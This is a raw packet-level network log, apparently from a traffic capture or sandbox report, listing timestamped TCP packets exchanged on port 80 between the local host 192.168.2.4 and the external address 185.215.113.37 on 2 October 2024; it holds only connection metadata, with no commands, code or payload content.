Oct 2, 2024 18:19:26.967525959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967535019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967542887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967550039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967560053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967576981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967591047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967844009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967858076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967873096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967884064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967888117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967899084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967902899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967915058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967917919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.967930079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967947006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.967959881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968147039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968162060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968175888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968185902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968199015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968199968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968215942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968219995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968233109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968236923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968254089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968266010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968445063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968461037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968476057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968482971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968497038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968514919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968569040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968585014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968600035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968607903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968615055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968625069 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968631029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968641996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968647003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968655109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968662977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968669891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968677044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968686104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968692064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.968700886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968715906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.968730927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969034910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969048977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969070911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969084024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969089985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969105005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969120979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969124079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969135046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969140053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969149113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969152927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969171047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969185114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969496012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969511032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969526052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969532967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969541073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969548941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969556093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969564915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969572067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969582081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969585896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969595909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969599962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969610929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969614983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969624043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969631910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969640017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969646931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.969656944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969671011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.969685078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972383976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972398043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972414017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972428083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972440958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972441912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972456932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972472906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972476959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972489119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972491980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972510099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972528934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972568989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972604990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972615957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972635984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.972650051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.972670078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.071958065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.076865911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498253107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498275995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498286963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498394966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498512983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498522043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498533964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498553038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498563051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498569012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498577118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498579979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498601913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498616934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498713970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498723984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498733997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498743057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498753071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498754025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498761892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498771906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498775959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498783112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498792887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.498807907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.498823881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499420881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499429941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499440908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499450922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499459982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499465942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499476910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499483109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499486923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499495983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499501944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499505043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499514103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499522924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499527931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499528885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499533892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499547958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499558926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499558926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499567986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499578953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499579906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499591112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499594927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499594927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499607086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.499622107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.499644995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500169992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500179052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500189066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500199080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500207901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500209093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500221014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500222921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500231028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500240088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500250101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500253916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500260115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500272036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500277996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500281096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500291109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500294924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500300884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500310898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500317097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500320911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.500332117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500345945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.500369072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501106977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501118898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501127005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501137972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501146078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501147032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501156092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501167059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501173973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501176119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501187086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501190901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501197100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501207113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501214027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501216888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501225948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501235962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501241922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501246929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501255035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501259089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501265049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501271009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501276016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501286030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.501296997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.501319885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502008915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502018929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502028942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502038956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502048016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502049923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502057076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502068043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502077103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502080917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502087116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502095938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502105951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502114058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502115965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502125978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502134085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502137899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502145052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502155066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502160072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502166033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502176046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502180099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502196074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502209902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.502933979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502943039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502952099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502963066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502971888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502980947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502990007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.502999067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503009081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503017902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503029108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503036976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503046036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503053904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503063917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503073931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503082991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503092051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503102064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503112078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503123999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503150940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503874063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503882885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503890991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503904104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503915071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503923893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503926039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503933907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503942966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503946066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503952980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503962040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503963947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503971100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503981113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.503982067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.503992081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504000902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504014969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504020929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504040956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504057884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504070044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504079103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504087925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504108906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504129887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504774094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504785061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504793882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504802942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504812002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504820108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504822969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504832983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504842043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504848957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504853010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504863024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504863024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504873037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504878044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504883051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504892111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504901886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504909992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504910946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504920959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504930019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504936934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504940987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.504951954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504966021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.504987001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.505848885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505863905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505873919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505883932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505893946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505903006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.505903959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505913019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505923033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505928040 CEST	49737	80	192.168.2.4	185.215.113.37
